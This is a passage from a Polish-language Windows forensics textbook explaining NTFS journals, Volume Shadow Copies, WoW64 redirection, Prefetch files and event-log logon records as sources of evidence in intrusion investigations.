Na rysunku 12.5 pokazano przykad wynikw zwrconych przez skrypt INDXParse.

Darmowe narzdzie do analizy systemw na ywo Redline firmy Mandiant take moe pobiera
i przetwarza rekordy INDX w ramach swoich funkcji wyszukiwania plikw (rysunek 12.6).
RYSUNEK 12.5. Wynik zwrcony przez narzdzi INDXParse w formacie bodyfile
RYSUNEK 12.6. Opcja kolektora w Redline umoliwiajca analiz atrybutw INDX
Dzienniki zmian
NTFS to system plikw, z ktrego mona odzyskiwa dane i w ktrym prowadzone s dzienniki
rejestrujce zmiany w katalogach i plikach. Dane z tych dziennikw mona wykorzysta do cofnicia
operacji systemu plikw w przypadku awarii. Dla informatyka ledczego informacje te s te
cennym rdem dowodw o aktywnoci w systemie plikw szczeglnie w przypadkach, gdy
haker prbowa usun plik lub ukry swoj dziaalno. W tym punkcie przedstawiamy krtki
przegld najwaniejszych dziennikw $LogFile i $UsnJrnl.
Plik dziennika NTFS o nazwie $LogFile zawiera spis wszystkich transakcji zmieniajcych
struktur woluminu. Nale do nich operacje utworzenia, kopiowania i usuwania katalogw,
zmiany metadanych plikw oraz modyfikacje rekordw INDX. Umieszczone w pliku $LogFile
wpisy dotyczce transakcji zawieraj takie same atrybuty jak tabela MFT. Dziennik ten znajduje si
w katalogu gwnym kadego woluminu NTFS i najczciej ma domylny rozmiar 64 MB. Podlega
on do czstej rotacji, zwaszcza na woluminach systemowych. Podobnie jak do analizy tabeli MFT
i innych artefaktw NTFS, do zbadania dziennika $LogFile z poziomu dziaajcego systemu
potrzebne jest specjalne narzdzie zapewniajce surowy dostp do dysku.
Dziennik USN (ang. Update Sequence Number) o nazwie $UsnJrnl zawiera bardziej oglne
zestawienie zmian na woluminie. Jego wpisy zawieraj informacj o rodzaju zmiany, znacznik
czasu zdarzenia, nazw pliku, jego atrybuty oraz identyfikatory wpisu MFT tego pliku i jego
katalogu nadrzdnego. cieka do tego dziennika to \$Extend\$UsnJrnl. Na niektrych woluminach
moe go nie by, poniewa nie jest wymagany przez system NTFS, ale wymagaj go niektre czsto
uywane usugi systemu Windows, takie jak usugi indeksowania i wyszukiwania oraz replikacji
plikw. Podobnie jak $LogFile, dziennik $UsnJrnl podlega rotacji, ktra na woluminie systemowym
moe by intensywna. W praktyce dziennik $UsnJrnl czsto zawiera wicej informacji o przeszych
zmianach w systemie plikw ni dziennik $LogFile, poniewa w jego wpisach znajduje si mniej
danych. Wicej informacji o dzienniku USN i narzdziu fsutil firmy Microsoft mona znale
na poniszych stronach.
W INTERNECIE
msdn.microsoft.com/en-us/library/aa365722.aspx
technet.microsoft.com/en-us/library/cc788042(v=ws.10).aspx
Poniej znajduje si lista narzdzi do przetwarzania i dekodowania artefaktw z dziennikw

$LogFile i $UsnJrnl.
W INTERNECIE
LogFileParser code.google.com/p/mft2csv/wiki/LogFileParser
TZWorks Journal Parser tzworks.net/prototype_page.php?proto_id=5
parser-usnjrnl code.google.com/p/parser-usnjrnl
Kopie zapasowe woluminw wykonywane w tle

Usuga kopiowania woluminw w tle (ang. Volume Shadow Copy VSC) to mechanizm tworzenia
kopii plikw na caym woluminie w odniesieniu do punktu w czasie, zwanych migawkami lub
punktami przywracania. Usug t wprowadzono w systemach Windows Server 2003 i Windows XP
w okrojonej wersji umoliwiajcej wykonywanie kopii zapasowych plikw. Natomiast w systemach
Windows Vista, Windows 7 i Windows Server 2008 implementacja usugi VSC jest ju znacznie
bardziej kompletna i rozbudowana. Wrd wielu wprowadzonych ulepsze znajduje si funkcja
Eksploratora o nazwie Przywr poprzednie wersje, ktra umoliwia przywrcenie pliku lub
katalogu do stanu zapisanego w poprzedniej migawce.
Uwaga Niektre okrelenia uywane w tym punkcie mog by nieco mylce. Przykadowo punkt przywracania
w kontekcie usugi VSC to migawka stanu systemu w danym momencie. To nie to samo, co stary
Punkt przywracania systemu dostpny w systemie Windows XP. W systemie tym nie wykorzystywano
usugi VSC tylko proces, w ramach ktrego wybrane klucze rejestru i pliki z pewnymi rozszerzeniami
byy automatycznie kopiowane do chronionego miejsca na dysku. Ze wzgldu na spadajc liczb
uytkownikw systemu Windows XP w rozdziale tym koncentrujemy si wycznie na implementacji
usugi VSC w systemach Windows 7, Vista i Server 2008.
Drog analizy kopii woluminu mona odzyska pliki, klucze rejestru i inne dane, ktre haker
mg usun lub zmieni w zdobytym przez siebie systemie. Nie bdziemy szczegowo opisywa
procesu wykonywania kopii woluminu, tylko skupimy si na kilku podstawowych kwestiach,
o ktrych trzeba wiedzie przed przystpieniem do analizy tego rodzaju materiau dowodowego.
Przede wszystkim warto wiedzie, e usuga VSC rejestruje zmiany w blokach danych na dysku,
a nie w logicznych plikach. Zamontowan kopi woluminu identyfikuje si jako lustrzany obraz
zawartoci monitorowanego woluminu, ale w rzeczywistoci usuga ta zapisuje tylko bloki, ktre
ulegy zmianie midzy kolejnymi migawkami. Domylnie system Windows ogranicza maksymaln
ilo miejsca dostpnego dla usugi VSC do 5% (Windows 7) lub 15% (Windows Vista)
pojemnoci woluminu.
Nie tylko ilo miejsca jest ograniczona. Take dostpno danych jest reglamentowana przez
czstotliwo wykonywania migawek. Utworzenie migawki moe nastpi automatycznie przed
instalacj dodatku Service Pack, aktualizacj systemu lub instalacj sterownika. Ponadto proces
moe zosta wywoany przez aplikacje uytkownika. Take usuga przywracania systemu moe
automatycznie tworzy codzienne migawki w ramach zaplanowanych zada.
Pewnie si domylasz, e kopie woluminw mog zawiera wiele danych, ktre zostay ju usunite
lub s nieobecne w aktualnym systemie plikw. Jeli np. znane s data i godzina aktywnoci hakera,
mona przeszuka zawarto kopii zapasowej woluminu wykonanej w najbliszym czasie. W ten
sposb udaje si wykry pliki, dane z gazi rejestru, a nawet wpisy dziennika zdarze, ktrych nie
daoby si zdoby w aden inny sposb.
Jak wydoby dane z kopii woluminu? Najpierw naley j zamontowa jako obraz dysku
lub napd w systemie Windows Vista lub 7. Pozwoli to na prac z usug VSC i korzystanie
z narzdzi do interakcji z obrazami lustrzanymi docelowego systemu plikw. Nastpnie naley
wczy wiersz polece jako administrator i wykona nastpujce polecenie:
vssadmin list shadows /for=[Litera_woluminu]
Polecenie to spowoduje wywietlenie listy wszystkich kopii woluminu wraz z identyfikatorami

kopii i woluminu, z ktrego pochodz, nazw woluminu, nazw hosta pochodzenia i innymi
atrybutami. Nastpnie mona utworzy dowizanie symboliczne za pomoc narzdzia mklink
w celu zamontowania kopii woluminu w wybranym katalogu:
mklink /D [katalog_docelowy] [kopia woluminu]
Zauwa, e dowizanie symboliczne nie moe wskazywa wczeniej utworzonego katalogu.

Ponadto na kocu cieki do kopii woluminu musi znajdowa si ukonik. Na rysunku 12.7
przedstawiono wyniki wykonania tych polece.
RYSUNEK 12.7. Skadnia polece do wywietlania listy kopii woluminw i montowania ich za pomoc
dowizania symbolicznego
Od tej pory w katalogu wskazanym przez dowizanie bdzie si znajdowa kopia woluminu
lustrzane odbicie caego systemu plikw woluminu w okrelonym momencie.
Cho narzdzia vssadmin i mklink wystarcz do przejrzenia zawartoci kopii woluminw
w systemie Windows, istnieje kilka innych darmowych narzdzi o bogatszej funkcjonalnoci
analitycznej, umoliwiajcych przeprowadzenie analiz w innych systemach operacyjnych.
Oto lista polecanych przez nas programw.
W INTERNECIE
libvshadow code.google.com/p/libvshadow
Dostpne na wielu platformach biblioteka i narzdzia do przetwarzania danych z kopii woluminw.
Shadow Explorer www.shadowexplorer.com
atwy w obsudze program do badania zawartoci migawek woluminw.
VSC Toolset dfstream.blogspot.com/p/vsc-toolset.html
Interfejs uytkownika umoliwiajcy montowanie kopii woluminw, przegldanie ich zawartoci
oraz wykonywanie na nich skryptw wsadowych.
Readresator systemu plikw

System Windows zapewnia podsystem zgodnoci (systemu Windows 32-bitowego w systemie
Windows 64-bitowym WoW64) umoliwiajcy uruchamianie 32-bitowych aplikacji w 64-bitowych
systemach operacyjnych. Zadaniem podsystemu WoW64 jest nie tylko zapewnienie aplikacjom
32-bitowym dostpu do odpowiednich wersji bibliotek DLL i innych zalenoci, ale rwnie
uniemoliwienie im nadpisania lub zmodyfikowania zasobw przeznaczonych dla aplikacji 64-bitowych.

Jednym z mechanizmw tej funkcji jest readresator systemu plikw, ktry moe mie powany
wpyw na prowadzenie ledztwa.
Pliki i zalenoci wykorzystywane przez 32-bitowe aplikacje w 64-bitowych wersjach systemu
Windows s przechowywane w osobnych katalogach. Jeli 32-bitowa aplikacja prbuje zaadowa
plik z katalogu %SYSTEMROOT%\system32\, podsystem WoW64 przekieruje j do katalogu
%SYSTEMROOT%\SysWOW64\ zawierajcego odpowiednie 32-bitowe pliki DLL. Aplikacja nie
wyczuwa tego przekierowania i nie widzi prawdziwego katalogu %SYSTEMROOT%\system32\,
ktry jest zarejestrowany dla aplikacji 64-bitowych. Wicej informacji na ten temat mona znale
w portalu Microsoft Developer Network.
W INTERNECIE
msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx
Dodatkowo w systemie Windows znajduje si osobny katalog Program Files dla aplikacji
32-bitowych o nazwie \Program Files (x86). Pliki aplikacji 64-bitowych s przechowywane
w katalogu \Program Files.
Uwaga Czasami hakerzy przez pomyk wykonuj 32-bitowe szkodliwe programy w 64-bitowych
systemach operacyjnych i w efekcie gubi pliki, ktre trafiy do innych katalogw,
np. C:\Windows\SysWOW64 zamiast C:\Windows\system32.
Znaczenie tych informacji dla ledztw prowadzonych w 64-bitowych wersjach systemu

operacyjnego Windows jest chyba oczywiste. Jeli do wyszukiwania plikw i katalogw uyje si
32-bitowych narzdzi wykorzystujcych interfejs API Windows, nie przeszukaj one takich cieek
jak C:\Windows\system32, ktre s dostpne wycznie dla aplikacji 64-bitowych. Oczywicie mona
pobra tabel MFT i z niej zrekonstruowa system plikw z pominiciem readresacji ale wwczas
i tak naley si upewni, e analizie zostay poddane wszystkie readresowane cieki. Dodatkowo
podsystem WoW64 przekierowuje kilka czsto uywanych cieek w rejestrze systemowym,
ale dokadniej opisujemy to zagadnienie w podrozdziale Rejestr systemu Windows.
POBIERANIE ZASOBW Z WYPRZEDZENIEM

Funkcja pobierania zasobw z wyprzedzeniem to mechanizm optymalizacyjny wprowadzony przez
firm Microsoft w systemie Windows XP w celu skrcenia czasu rozruchu systemu i uruchamiania
aplikacji. Aby zrozumie sens istnienia tego mechanizmu i to, jakim jest cennym rdem materiau
dowodowego, trzeba wiedzie, jak system Windows zarzdza pamici.
Meneder pamici podrcznej systemu Windows to skadnik systemu zarzdzania pamici
monitorujcy dane i kod, ktre s adowane z dysku przez dziaajce procesy. Dokadniej mwic,
system ten analizuje dwie pierwsze minuty procesu rozruchu systemu i dziesi pierwszych sekund
uruchamiania aplikacji. Nastpnie meneder pamici podrcznej zapisuje w harmonogramie zada

wyniki analizy w celu zaplanowania pobierania okrelonych plikw z wyprzedzeniem. Przy nastpnym
rozruchu systemu lub uruchamianiu zoptymalizowanej aplikacji meneder pamici podrcznej
wykorzystuje sporzdzone zapiski jako cigawk w celu przyspieszenia procesu adowania zasobw.
Dowody
Pliki do pobierania z wyprzedzeniem s przechowywane w katalogu %SYSTEMROOT%\Prefetch,
w ktrym mona znale nastpujce pliki.
NTOSBOOT-B00DFAAD.pf plik rozruchu systemu. Ma on zawsze tak sam nazw. W systemach
Windows Server jest to jedyny domylnie tworzony plik pobierania z wyprzedzeniem.
Layout.ini plik zawierajcy dane wykorzystywane przez defragmentator dysku.
NazwaAplikacji-########.pf grupa maksymalnie 128 plikw z rozszerzeniem .pf,
z ktrych kady reprezentuje plik wykonywalny, jaki zosta przynajmniej raz uruchomiony.
Nazwy tych plikw s utworzone z nazwy pliku wykonywalnego i 32-bitowego skrtu cieki
do tego pliku poczonych cznikiem. Oznacza to, e jeli ten sam plik zostanie uruchomiony
w dwch rnych miejscach, powstan dla niego dwa pliki pobierane z wyprzedzeniem.
Rysunek 12.8 przedstawia cz zawartoci katalogu C:\Windows\Prefetch z obrazu
zaadowanego w programie FTK Imager.
RYSUNEK 12.8. Zawarto folderu C:\Windows\Prefetch

Uwaga W systemach Windows Vista i 7 mona znale dodatkowe pliki o nazwach utworzonych wg wzoru
Ag*.db, np. AgAppLaunch.db. S one generowane przez inny mechanizm optymalizacji wydajnoci
o nazwie SuperFetch, ktry moe dziaa wsplnie z mechanizmem pobierania plikw z wyprzedzeniem.
Nie ma dokumentacji formatu tych plikw, ale niektrzy ju analizuj ich struktur i zawarto
(zobacz blog.rewolf.pl/blog/?p=214).
Czasami spotykamy te systemy z pustym katalogiem Prefetch. Wwczas mona sprawdzi

ustawienia w kluczu rejestru HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Session Manager\Memory Management\PrefetchParameters. Szczeglnie wane s w nim dwie
nastpujce wartoci.
EnablePrefetcher steruje dziaaniem skadnika Prefetcher. Dostpne s nastpujce
ustawienia: 1 wyczenie skadnika; 2 pobieranie z wyprzedzeniem plikw
rozruchowych systemu; 3 pobieranie z wyprzedzeniem plikw wszystkich aplikacji.
Funkcja ta jest czsto wyczona w serwerach i systemach z dyskami SSD.
HostingAppList okrela specjalne aplikacje Windows, ktre aduj inne moduy
wykonywalne, takie jak DLLHOST.EXE, MMC.EXE i RUNDLL.EXE. Skadnik Prefetcher
dodaje zaadowany modu do wartoci skrtu Prefetch dla tych aplikacji.
Naley wiedzie, e nawet jeli warto EnablePrefetcher zostanie ustawiona na 3,
system Windows nie bdzie tworzy plikw pobieranych z wyprzedzeniem w nieskoczono
maksymalnie moe by ich 128.
Analiza
Skoro wiesz, jak system Windows tworzy i wykorzystuje pliki wczytywane z wyprzedzeniem,
z pewnoci domylasz si te, jak cennym rdem informacji mog by w ledztwie.
Pliki pobierane z wyprzedzeniem su jako rejestr programw uruchamianych w systemie
niezalenie od tego, czy pliki wykonywalne wci znajduj si na dysku. Cho nie tylko istnienie
pliku pobieranego z wyprzedzeniem jest dowodem na to, e dana aplikacja bya uruchamiana,
to w ten sposb mona dowiedzie si, kiedy j uruchomiono, ile razy to zrobiono i jaka bya
jej cieka.
Najprostszym sposobem analizy plikw pobieranych z wyprzedzeniem jest przyjrzenie si
ich standardowym znacznikom czasu. Data utworzenia pliku wskazuje, kiedy dan aplikacj
uruchomiono po raz pierwszy. Data ostatniej modyfikacji jest informacj o ostatnim
uruchomieniu programu. Oczywicie z nazwy pliku pobieranego z wyprzedzeniem nie odczytamy
cieki. Przykadowo plik o nazwie EXPLORER.EXE-A840CB32.pf mgby zosta utworzony
zarwno dla legalnego pliku %SYSTEMROOT%\Explorer.exe, jak i C:\path\to\evil\Explorer.exe.
T wan informacj mona zdoby, wraz z innymi przydatnymi danymi, analizujc tre pliku
pobieranego z wyprzedzeniem.
Uwaga Na wietnym blogu o tematyce dotyczcej informatyki ledczej Hexacorn opublikowano

ciekawy artyku na temat sposobu obliczania cieek plikw pobieranych z wyprzedzeniem,
skrypt Perl generujcy skrty wykorzystywane w nazwach plikw pobieranych z wyprzedzeniem
oraz list skrtw dla macierzystych plikw wykonywalnych systemu Windows znajdujcych si
w domylnych katalogach http://www.hexacorn.com/blog/2012/06/13/
prefetch-hash-calculator-a-hash-lookup-table-xpvistaw7w2k3w2k8/.
Jakie dodatkowe informacje mona znale w plikach pobieranych z wyprzedzeniem?

Najbardziej cenna jest lista penych cieek, z liter woluminu, do plikw adowanych przez
aplikacj w cigu pierwszych dziesiciu sekund od jej uruchomienia. Zalicza si do nich sam plik
wykonywalny programu, dziki czemu mona sprawdzi, gdzie dokadnie znajdowa si na dysku.
Moe to by bardzo wana informacja np. plik C:\Users\Jan Kowalski\svchost.exe jest o wiele
bardziej podejrzany ni C:\Windows\System32\svchost.exe. Na licie uywanych plikw znajduj
si te zasoby wykorzystywane przez aplikacj (np. biblioteki DLL) oraz pliki uyte do pobrania
danych lub zapisania wynikw.
Uwaga Jedynym wyjtkiem od tej dziesiciosekundowej reguy jest plik pobierany z wyprzedzeniem
NTOSBOOT. W jego przypadku uywane pliki s monitorowane przez dwie pierwsze minuty
procesu rozruchu.
Na rysunku 12.9 przedstawiono plik pobierany z wyprzedzeniem wygenerowany dla narzdzia

do zrzucania hase pwdump2x.exe w programie WinPrefetchView firmy NirSoft. Zauwa,
e w treci tego pliku znajduje si odwoanie do pliku pwdump_out.txt, w ktrym narzdzie
zapisao zdobyte hasa.
RYSUNEK 12.9. Lista uywanych plikw pliku pobieranego z wyprzedzeniem wygenerowanego dla aplikacji
pwdump2x.exe
Dane te mog by te przydatne do analizy plikw pobieranych z wyprzedzeniem dla aplikacji

macierzystych. Haker mg np. wykorzysta aplikacj rundll.exe do zainstalowania lub uruchomienia
kodu znajdujcego si w spreparowanej bibliotece DLL. Jako e rundll.exe widnieje na licie plikw
wykonywalnych w wartoci rejestru HostingAppList, dla pliku tego czsto wygenerowanych jest
wiele plikw pobieranych z wyprzedzeniem przegldajc list uywanych plikw, zawsze mona
oddzieli legalne przypadki uycia od szkodliwych.
Uwaga Podczas dochodze czsto masowo pobieramy i analizujemy pliki pobierane z wyprzedzeniem
z wielu systemw, a nastpnie sortujemy je wg cieki. Jest to bardzo dobry sposb na wykrycie
nieznanych do tej pory plikw binarnych wykonywanych w miejscach, ktre nigdy nie s uywane
przez legalne programy (np. w katalogu informacji o woluminie systemowym czy koszu).
Ponadto kady plik pobierany z wyprzedzeniem zawiera licznik przypadkw uruchomienia

aplikacji, do ktrej si odnosi. To te jest czasami cenna informacja w jednym z niedawno
prowadzonych ledztw odkrylimy w pliku pobieranym z wyprzedzeniem dotyczcym kopii hakera
pliku Rar.exe, e aplikacja ta w cigu ostatnich dwch miesicy bya uruchamiana kilkadziesit
razy. czc ten fakt z innymi odkryciami, zdobylimy dowody potwierdzajce, e intruz wykrad
due iloci danych z systemu.
Uwaga Co si dzieje, gdy kto uruchomi plik z alternatywnego strumienia danych (moliwe tylko w systemie
Windows XP i starszych wersjach Windows)? W katalogu Prefetch zostanie utworzony plik o takiej
samej nazwie jak nazwa pliku strumienia gwnego. Bdzie on zawiera alternatywny strumie
danych z danymi dotyczcymi pobierania z wyprzedzeniem o normalnej nazwie dla tego typu plikw.
Jeli np. kto uruchomi plik C:\Windows:evil.exe (alternatywny strumie danych katalogu Windows),
w katalogu Prefetch moe zosta utworzony plik C:\Prefetch\Windows:evil.exe-A02B49FF.
Pliki pobierane z wyprzedzeniem zawieraj te dat i godzin ostatniego uruchomienia

aplikacji (ang. Last Run Time). Czemu dane te mog rni si od czasu ostatniej modyfikacji
samego pliku pobieranego z wyprzedzeniem? Czsto si zdarza, e warto Last Run Time jest
o okoo dziesi sekund wczeniejsza od wartoci czasu ostatniej modyfikacji. Prawdopodobn
przyczyn tego stanu rzeczy jest odstp w czasie midzy uruchomieniem programu, rozpoczciem
monitorowania przez meneder bufora jego pierwszych sekund aktywnoci oraz zapisem lub
aktualizacj pliku pobieranego z wyprzedzeniem.
Narzdzia do analizy plikw pobieranych z wyprzedzeniem

Pliki pobierane z wyprzedzeniem zawieraj dane binarne w niestandardowym formacie.
Caa wiedza na ich temat jest opisana w portalu Forensics Wiki pod poniszym adresem.
W INTERNECIE
www.forensicswiki.org/wiki/Windows_Prefetch_File_Format
Z metadanych pliku pobieranego z wyprzedzeniem mona dowiedzie si np. o dacie jego

utworzenia i ostatniej modyfikacji oraz zdoby informacje, np. o pierwszym i ostatnim
uruchomieniu programu. Aby dosta si do zakodowanych danych, takich jak licznik uruchomie,
cieka pliku wykonywalnego czy listy uywanych plikw, naley skorzysta ze specjalnego
narzdzia do analizy plikw .pf. Znalelimy trzy programy, ktre si do tego nadaj.
Uwaga WinPrefetchView www.nirsoft.net/utils/win_prefetch_view.html

TZWorks Prefetch Parser www.tzworks.net/prototype_page.php?proto_id=1
RedWolf Forensics Prefetch-Parser redwolfcomputerforensics.com/index.php?option=
com_content&task=view&id=42&Itemid=55
DZIENNIKI ZDARZE
Dzienniki zdarze s generowane przez systemowe mechanizmy inspekcji i monitoringu.
Analizujc je, mona zdoby informacje o zdarzeniach, takich jak:
udane i nieudane prby logowania wraz ze rdem pochodzenia;
czas utworzenia, uruchomienia i zatrzymania usug systemowych;
przypadki uycia okrelonych aplikacji;
zmiany w zasadach inspekcji;
zmiany uprawnie uytkownikw;
aktywno zainstalowanych aplikacji (np. programw antywirusowych, baz danych
oraz usug serwerw sieciowych).
W podrozdziale tym dowiesz si, gdzie szuka dziennikw zdarze systemu Windows. Troch
miejsca powicamy te technikom analizy najbardziej przydatnych podczas ledztwa typw wpisw
dziennikw. Przy okazji pokazujemy, jak dzienniki zdarze pomagaj w badaniu typowych ladw
aktywnoci rozpoznawczej, uruchamiania szkodliwych programw i innych ladw charakterystycznych
dla szkodliwej aktywnoci w systemach Windows.
Dowody
Wszystkie wersje systemu Windows prowadz trzy podstawowe dzienniki zdarze: aplikacji,
systemu i bezpieczestwa. Aktywnoci zwizane z programami uytkownika i aplikacjami
komercyjnymi s rejestrowane w dzienniku aplikacji. Kontroli systemowej podlegaj wszelkie
bdy i informacje raportowane przez aplikacje. W dzienniku tym dane zapisuj te narzdzia
zabezpieczajce, takie jak programy antywirusowe i systemy zapobiegania wamaniom.
Procesy uwierzytelniania i zabezpiecze zapisuj informacje o zdarzeniach w dzienniku
zabezpiecze. Mona wic w nim znale dane dotyczce prb logowania i wylogowania
uytkownikw, tworzenia kont, zmian uprawnie i danych powiadczajcych uytkownikw,
zmian w zasadach inspekcji, uruchamiania procesw oraz uywania plikw i katalogw.
W ustawieniach zasad lokalnych i grupowych mona dokadnie wybra, ktre zdarzenia

dotyczce bezpieczestwa maj by przechwytywane i rejestrowane.
Systemowe dzienniki zdarze zawieraj informacje o zdarzeniach dotyczcych rnych
rdzennych skadnikw systemu Windows. Mona w nich znale informacje o zdarzeniach usug,
zmianach czasu systemowego, przypadkach adowania i usuwania sterownikw oraz kwestiach
zwizanych z konfiguracj sieci.
Dzienniki zdarze systemu Windows s atwo dostpne. Kady ma osobny plik znajdujcy si
w katalogu wskazanym przez klucz rejestru HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\Eventlog. W systemach Windows XP, Windows Server 2003 i starszych domylne cieki
dziennikw zdarze s nastpujce:
Dziennik aplikacji %SYSTEMROOT%\System32\Config\AppEvent.Evt,
Dziennik systemowy %SYSTEMROOT%\System32\Config\SysEvent.Evt,
Dziennik zabezpiecze %SYSTEMROOT%\System32\Config\SecEvent.Evt.
Pliki EVT s w firmowym formacie, ktrego nie mona odczyta ani przeanalizowa bez
specjalnych narzdzi.
W nowych wersjach systemu Windows, od Vista i Server 2008, firma Microsoft wprowadzia
znaczne zmiany w systemie dziennikw zdarze. Pliki EVT zastpiono nowym formatem opartym
na standardzie XML oraz zmieniono rozszerzenie plikw na .evtx. Take cieki domylne ulegy zmianie:
Dziennik aplikacji %SYSTEMROOT%\System32\Winevt\Logs\Application.evtx,
Dziennik systemowy %SYSTEMROOT%\System32\Winevt\Logs\System.evtx,
Dziennik zabezpiecze %SYSTEMROOT%\System32\Winevt\Logs\Security.evtx.
Dodatkowo wprowadzono drug kategori dziennikw, aplikacje i usugi, ktre s uywane
przez indywidualnie zainstalowane aplikacje i skadniki systemu. Dzienniki te rwnie maj format
EVTX i s przechowywane w katalogu %SYSTEMROOT%\System32\Winevt\Logs\. W kategorii tej
mog zapisywa swoje dzienniki takie aplikacje jak Harmonogram zada, Zapora sieciowa systemu
Windows, AppLocker, usugi terminalowe oraz funkcja kontroli dostpu uytkownika. Wprawdzie
tematem tego podrozdziau s gwne dzienniki systemu Windows, ale od czasu do czasu
podpowiadamy te, jak mona wykorzysta te inne typy dziennikw.
Analiza
O niezliczonych typach zdarze generowanych przez system Windows, podobnie jak o rejestrze,
mona by napisa ca ksik. Z racji ograniczonej iloci miejsca postanowilimy wic ograniczy
si tylko do tych zdarze, ktre s najbardziej przydatne podczas ledztwa.
Identyfikatory zdarze
Kady rodzaj zdarze rejestrowanych w dziennikach systemu Windows ma identyfikator. Gdy
trzeba zdoby bardziej szczegowe informacje lub przefiltrowa zdarzenia, identyfikatory te s
czsto bardziej przydatne ni same wiadomoci o zdarzeniach. Nie ma miejsca w tym rozdziale
na opis kilkuset identyfikatorw mogcych przyda si podczas postpowania dochodzeniowego,

ale na szczcie firma Microsoft utworzya przydatn wyszukiwark o nazwie Events and Errors
Message Center, w ktrej mona poszuka szczegowych informacji.
W INTERNECIE
Bazy danych informacji o identyfikatorach zdarze systemu Windows mona znale w kilku portalach
internetowych, np. www.myeventlog.com i www.eventid.net. Cho tylko nieliczne z tych rde zawieraj
informacje o identyfikatorach zdarze z dziennikw aplikacji i usug oraz nie s oficjalnie wspierane
przez firm Microsoft, na pocztek czsto wystarczaj.
Wyszukiwarka Microsoftu umoliwia znalezienie informacji o identyfikatorach zdarze oraz

wyszukiwanie zdarze zawierajcych okrelony tekst lub wygenerowanych przez konkretne rda.
Ostrzeenie Firma Microsoft zmienia identyfikatory niektrych typw zdarze midzy wersj jdra
NT Kernel 5 (2000, XP, 2003) a 6 (Vista, 7, 2008). Wiele nowych identyfikatorw rni si od
starych tylko dodatkiem liczby 4096 (np. identyfikator zdarzenia udanego logowania zmieni si
z 540 na 4624, ale zdarzenia uruchomienia i zatrzymania usugi nadal maj identyfikator 7036).
Zdarzenia logowania
Prowadzc ledztwo w systemie Windows, prawie zawsze trzeba zbada i przeanalizowa zdarzenia
logowania. Jest to konieczne w celu dowiedzenia si, jak legalny uytkownik korzysta z wasnego
systemu lub jak haker zdoby do niego dostp. Czasami analiza nieudanych prb logowania pozwala
wykry ataki typu brute force albo trzeba dowiedzie si, w jaki sposb byo wykorzystywane konto,
na ktrym doszo do wamania. We wszystkich tych przypadkach pomocny moe by dziennik
zdarze zabezpiecze.
Spjrzmy na przykadowy zapis zdarzenia logowania i zobaczmy, jakie zawiera skadniki.
Przykad ten zaczerpnito z systemu Windows XP, ale takie same informacje otrzymano by take
w nowszych wersjach systemu Windows:
Identyfikator zdarzenia: 540
Pomylne logowanie do sieci:

Nazwa uytkownika: Administrator
Domena: CORPDOMAIN
Identyfikator logowania: (0x0,0x3E2C4E73)
Typ logowania: 3
Proces logowania: NtLmSsp
Pakiet uwierzytelnie: NTLM
Nazwa stacji roboczej: laptop1022
rdowy adres sieciowy: 10.0.1.13
Sporo tu terminologii kryptograficznej jak na proste zdarzenie logowania. Poniej znajduje si

opis poszczeglnych pl tej wiadomoci.
Nazwa uytkownika konto uyte do logowania.
Domena domena, z ktr powizany jest dany uytkownik. Jeli jest to lokalne konto
uytkownika, pole to zawiera nazw hosta systemowego.
Identyfikator logowania identyfikator sesji. Wartoci tej mona uy do szukania
i filtrowania danych, gdy trzeba znale wszystkie wpisy dziennika dotyczce tej konkretnej
sesji logowania.
Typ logowania kod oznaczajcy typ logowania zainicjowanego przez uytkownika.
Ponisza tabela zawiera wicej informacji o tym polu i jego moliwych wartociach.
Typ Kod Typ Kod

Interakcyjne 2 Odblokowujce 7
Sieciowe 3 NetworkCleartext 8
Wsadowe 4 NewCredentials 9
W trybie usugi 5 RemoteInteractive 10
Proxy 6 CacheInteractive 11
Przyjrzymy si bliej tym typom.

Logowanie interakcyjne uytkownik zalogowa si za pomoc konsoli (np. uywajc
klawiatury komputera hosta), polecenia RunAS lub skorzysta ze sprztowego zdalnego
punktu dostpowego (np. KVM).
Logowanie sieciowe uytkownik zalogowa si przez sie. Zdarzenie tego typu moe
zosta wygenerowane dla operacji zamontowania udziau przy uyciu polecenia net use
oraz zalogowania do serwera sieciowego przez uwierzytelnianie zintegrowane serwera IIS.
Logowanie wsadowe sesja logowania zostaa wygenerowana przez zadanie zaplanowane.
Logowanie w trybie usugi nastpio zalogowanie usugi systemu Windows przy uyciu
danych powiadczajcych podanych w konfiguracji.
Logowanie proxy firma Microsoft definiuje ten typ logowania jako logowanie typu
proxy. Chcielibymy zobaczy, jak to wyglda w prawdziwej sytuacji albo zdoby jak
dokumentacj z wyjanieniem, w jaki sposb moe to zosta wygenerowane.
Logowanie w celu odblokowania uytkownik odblokowa system (np. po wczeniu si
wygaszacza ekranu).
NetworkCleartext zdarzenie zwykle generowane przez logowanie z podstawowym
uwierzytelnianiem na serwerach sieciowych.
NewCredentials uytkownik uy innego zestawu danych powiadczajcych
dla poczenia zdalnego (np. przez uycie polecenia RunAs).
RemoteInteractive uytkownik zalogowa si przez usugi terminalowe, usug pomocy

zdalnej lub zdalny pulpit.
CacheInteractive uytkownik zalogowa si za pomoc domenowych danych
powiadczajcych, ktre zostay sprawdzone przy uyciu zapisanych lokalnie danych,
a nie przez kontakt z kontrolerem domeny.
Wicej informacji mona znale na poniszej stronie.
W INTERNECIE
www.microsoft.com/technet/support/ee/transform.aspx?ProdName=Windows+
Operating+System&ProdVer=5.0&EvtID=540&EvtSrc=Security&LCID=1033
Wracamy do przegldu pl wpisu o zdarzeniu logowania.

Proces logowania proces, ktry zainicjowa zdarzenie. Typowe opcje to np. NtLmSsp,
Kerberos, User32 i Advapi.
Pakiet uwierzytelniania protok bezpieczestwa i uwierzytelniania uyty do
przetworzenia zdarzenia logowania. Typowe opcje to np. NTLM, Kerberos i Negotiate.
Nazwa stacji roboczej system bdcy rdem operacji logowania.
Nie zawsze informacja ta jest rejestrowana w dzienniku zdarze.
rdowy adres sieciowy adres IP rda, ktre zainicjowao logowanie.
Nie zawsze informacja ta jest rejestrowana w dzienniku zdarze.
Pole Typ logowania mona wykorzysta przy szukaniu i filtrowaniu dziennika zdarze
zabezpiecze. Jeli wiadomo, e haker wchodzi do systemu przy uyciu skradzionych danych
powiadczajcych za pomoc polecenia net use, to zdarzenia logowania w celu odblokowania
i konsolowego mona odrzuci jako nic nieznaczce. Jeeli konto usugi aplikacji nie powinno si
logowa interaktywnie, mona skoncentrowa si na zdarzeniach RemoteInteractive.
